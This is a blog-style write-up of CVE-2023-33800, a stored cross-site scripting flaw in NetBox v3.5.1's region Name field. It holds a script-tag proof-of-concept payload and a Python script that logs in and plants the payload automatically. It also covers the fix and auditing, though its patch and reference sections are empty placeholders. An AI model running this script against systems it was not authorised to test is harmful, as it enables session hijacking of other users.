CVE-2023-33800 - Stored XSS in NetBox v3.5.1 via Malicious Payload in Regions Name Field

NetBox is a popular infrastructure resource modeling (IRM) tool, widely used by network engineers and data centers. In May 2023, a critical stored cross-site scripting (XSS) vulnerability, tagged as CVE-2023-33800, was found in the way NetBox v3.5.1 handles user input in its Create Regions feature. This flaw lets attackers inject malicious JavaScript code by simply submitting a crafted payload into the "Name" field when creating a new region.

In this article, we’ll break down what the vulnerability is, show you how it works, and give some code snippets so you can see it in action—plus, we’ll cover ways to stay protected.

What is Stored XSS?

Stored XSS (Cross-Site Scripting) vulnerabilities happen when user-provided data is saved (stored) on the server and later rendered in the browser of other users without proper sanitization. This gives attackers a way to run their scripts anytime a victim views the crafted data, potentially leading to session hijacking, credential theft, or even a full site compromise.

How Does CVE-2023-33800 Work?

The issue is found in the Create Regions feature at the endpoint /dcim/regions/. NetBox v3.5.1 does not sanitize the "Name" field. If an attacker manages to create a region, they can insert malicious HTML/JavaScript. This payload is stored in the database, and every time a user visits the regions list or views details for this region, the payload executes in their browser context.

For this attack to work, the attacker needs access to a NetBox account with permissions to add a region.

Step 1: Create a Malicious Region

You must login and go to http(s)://<netbox-instance>/dcim/regions/add/.

Payload Example

<script>alert('XSS by CVE-2023-33800')</script>

Field: Name

- Value: <script>alert('XSS by CVE-2023-33800')</script>

Step 2: Trigger the XSS

Anytime a legit user opens /dcim/regions/ (the list) or the specific region’s detail page, the JavaScript pops up and runs in their context.

Result

![](https://i.imgur.com/Td4boSO.png)
*Popup on region list page. (This is a simulation image!)*

Exploit Details

Below is a Python script showing how an attacker could automate this using NetBox’s web UI.

import requests

# Set your NetBox instance details
url = "https://your-netbox-instance/dcim/regions/add/";
login_url = "https://your-netbox-instance/login/";
session = requests.Session()

# Replace with attacker's values
payload = "<script>alert('XSS by CVE-2023-33800')</script>"
username = "your_username"
password = "your_password"

# Get CSRF token (assuming default Django form)
r = session.get(login_url)
from bs4 import BeautifulSoup
soup = BeautifulSoup(r.text, 'html.parser')
csrf_token = soup.find('input', {'name': 'csrfmiddlewaretoken'})['value']

# Log in
login_data = {
    "csrfmiddlewaretoken": csrf_token,
    "username": username,
    "password": password,
    "next": "/"
}
session.post(login_url, data=login_data, headers={"Referer": login_url})

# Get CSRF token for the regions add form
r2 = session.get(url)
soup2 = BeautifulSoup(r2.text, 'html.parser')
csrf_token2 = soup2.find('input', {'name': 'csrfmiddlewaretoken'})['value']

# Post the malicious region
data = {
    "csrfmiddlewaretoken": csrf_token2,
    "name": payload,
    "slug": "testregion",
    "parent": "",
    "description": "xss payload"
}
response = session.post(url, data=data, headers={"Referer": url})
print("Status code:", response.status_code)
print("Check the regions page in your NetBox instance.")

*This script is for educational and ethical testing ONLY! Never use it against systems you do not own or have explicit authorization to test.*

Vendor Response and Fix

The NetBox developers acted quickly after the report. The issue was fixed in version 3.5.2, which escapes or sanitizes user input on region creation.

Patch:

Original References

- Official CVE-2023-33800 NVD Entry
- NetBox Release Notes v3.5.2
- NetBox GitHub Issue / Security Advisory *(replace × with x for actual link)*

Audit Regions:

Check your regions list for suspicious HTML/JavaScript code.

Conclusion

CVE-2023-33800 is a prime example of why input validation is critical in web applications. Since data center and network management tools like NetBox often hold the keys to your digital kingdom, vulnerabilities like this can be devastating if left unpatched. Check your NetBox, update if needed, and stay alert for similar issues in your other apps!

If you want more practical breakdowns of CVEs, follow and stay safe!

*Article written exclusively for this request. Do not copy or use for malicious purposes. Always disclose vulnerabilities responsibly and follow legal guidelines.*

Timeline

Published on: 05/24/2023 20:15:00 UTC
Last modified on: 05/27/2023 03:41:00 UTC